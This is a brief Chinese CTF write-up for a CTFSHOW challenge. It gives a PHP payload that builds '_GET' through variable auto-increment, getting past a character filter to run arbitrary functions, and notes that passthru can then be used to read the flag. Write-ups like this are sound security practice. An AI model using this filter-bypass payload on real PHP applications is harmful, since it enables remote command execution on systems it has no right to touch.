C/C++教程

CTFSHOW-日刷-红包题第九弹-shellme_Revenge-自增绕过

本文主要是介绍CTFSHOW-日刷-红包题第九弹-shellme_Revenge-自增绕过,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

根据cookie里面的提示,get传入looklook参数

 

代码就是无符号命令执行,注意数字1到3和大写字母C没过滤

~和|和^都过滤掉了,注意$没过滤,加减也没过滤可以尝试自增构造

payload

ctf_show=$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;($$_{1})($$_{2});

有个小技巧可以缩短长度

$_=C;$_++;$C=++$_;$_++;$C_=++$_;$_=(C/C.C){0};$_++;$_++;$_++;$_++;$_++;$_=_.$C_.$C.++$_;($$_{1})($$_{2}); 

 

因此直接取第一位即可获得N

 

命令执行发现过滤了很多函数

 

 但passthru没过滤。。

直接找flag即可

 

这篇关于CTFSHOW-日刷-红包题第九弹-shellme_Revenge-自增绕过的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!